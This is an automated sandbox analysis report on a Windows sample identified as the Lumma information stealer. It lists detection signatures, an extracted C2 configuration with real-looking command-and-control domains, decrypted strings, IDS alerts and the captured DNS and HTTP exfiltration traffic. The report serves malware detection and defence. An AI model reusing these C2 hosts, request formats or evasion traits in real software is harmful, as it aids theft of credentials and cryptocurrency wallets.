Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1538207
MD5:7a359b81462a150726f40ae4d2ca23d5
SHA1:07cc406c2b3ffdc91180d0b63b72326b6e14afd2
SHA256:09c2ebee2e986aa2147ae54994262812f682a9534335b4843d486765e83f56ca
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6372 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7A359B81462A150726F40AE4D2CA23D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["dissapoiznw.store", "mobbipenju.store", "spirittunek.store", "bathdoomgaz.store", "licendfilteo.site", "studennotediw.store", "eaglepawnoy.store", "clearancek.site"], "Build id": "4SD0y4--legendaryy"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-20T20:14:59.486612+020020546531A Network Trojan was detected192.168.2.449731104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-20T20:14:59.486612+020020498361A Network Trojan was detected192.168.2.449731104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-20T20:14:56.403458+020020564771Domain Observed Used for C2 Detected192.168.2.4528001.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-20T20:14:56.284591+020020564711Domain Observed Used for C2 Detected192.168.2.4647461.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-20T20:14:56.379461+020020564811Domain Observed Used for C2 Detected192.168.2.4599341.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-20T20:14:56.356741+020020564831Domain Observed Used for C2 Detected192.168.2.4535361.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-20T20:14:56.431526+020020564731Domain Observed Used for C2 Detected192.168.2.4498081.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-20T20:14:56.296573+020020564851Domain Observed Used for C2 Detected192.168.2.4573921.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-20T20:14:56.417088+020020564751Domain Observed Used for C2 Detected192.168.2.4492851.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-20T20:14:56.391847+020020564791Domain Observed Used for C2 Detected192.168.2.4637021.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-20T20:14:58.475439+020028586661Domain Observed Used for C2 Detected192.168.2.449730104.102.49.254443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: file.exeAvira: detected
    Source: https://steamcommunity.com:443/profiles/76561199724331900URL Reputation: Label: malware
    Source: file.exe.6372.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["dissapoiznw.store", "mobbipenju.store", "spirittunek.store", "bathdoomgaz.store", "licendfilteo.site", "studennotediw.store", "eaglepawnoy.store", "clearancek.site"], "Build id": "4SD0y4--legendaryy"}
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: file.exeJoe Sandbox ML: detected
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.store
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.store
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.store
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.store
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.store
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.store
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0055D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0055D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh0_2_005963B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00595700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h0_2_0059695B
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_005999D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_0055FCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00560EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_00594040
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [edx]0_2_00551000
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec ebx0_2_0058F030
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00566F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00596094
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_0057D1E1
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00572260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], ax0_2_00572260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_005642FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_0055A300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_005823E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_005823E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_005823E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], al0_2_005823E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_005823E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+14h]0_2_005823E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0056D457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]0_2_00591440
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_0057C470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_0056B410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_0057E40C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh0_2_005964B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00579510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00566536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh0_2_00597520
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0058B650
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_0057E66A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]0_2_00597710
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]0_2_005967EF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_0057D7AF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_005728E9
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_0056D961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h0_2_00593920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_005549A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_00555A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_00594A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00561A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00561ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_00599B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+000006B8h]0_2_0056DB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h0_2_0056DB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00563BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00561BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00580B80
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h0_2_0057EC48
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_00577C00
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh0_2_0058FC20
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_0057CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0057CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h0_2_0057CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00599CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh0_2_00599CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_0057AC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], ax0_2_0057AC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh0_2_0057FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_0057DD29
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00598D8A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, word ptr [ecx]0_2_0057AE57
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00575E70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00577E60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, ecx0_2_00564E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00561E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]0_2_0055BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_00566EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_00556EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0058FF70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00579F62
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00558FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], 0000h0_2_0056FFDF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00595FD6
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h0_2_00597FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00597FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00566F91

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:63702 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:52800 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:57392 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:49808 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:53536 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:64746 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:59934 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:49285 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 104.102.49.254:443
    Source: Malware configuration extractorURLs: dissapoiznw.store
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: spirittunek.store
    Source: Malware configuration extractorURLs: bathdoomgaz.store
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: studennotediw.store
    Source: Malware configuration extractorURLs: eaglepawnoy.store
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C0e3d185a3e106e73b244decdec33a0ea; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=e6a0f35c3786079464e2950d; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 20 Oct 2024 18:14:58 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: LRPC-e9c77b0923665da6f1captcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: captcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 20 Oct 2024 18:14:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7NBve1yZenzcS24YSNAg1NZSkRWPUyTYji1ee7z3FEEY4zhZTRD5CWlyA%2F9LQVKB6eW9LFhx37SWaOAm6iIHFnMEudmJiVr%2BAMtOpWlEFn4w0xzV4C5kbz8zIc%2FyGvMplhRwTg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d5afd9d4b962ac0-LAX
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
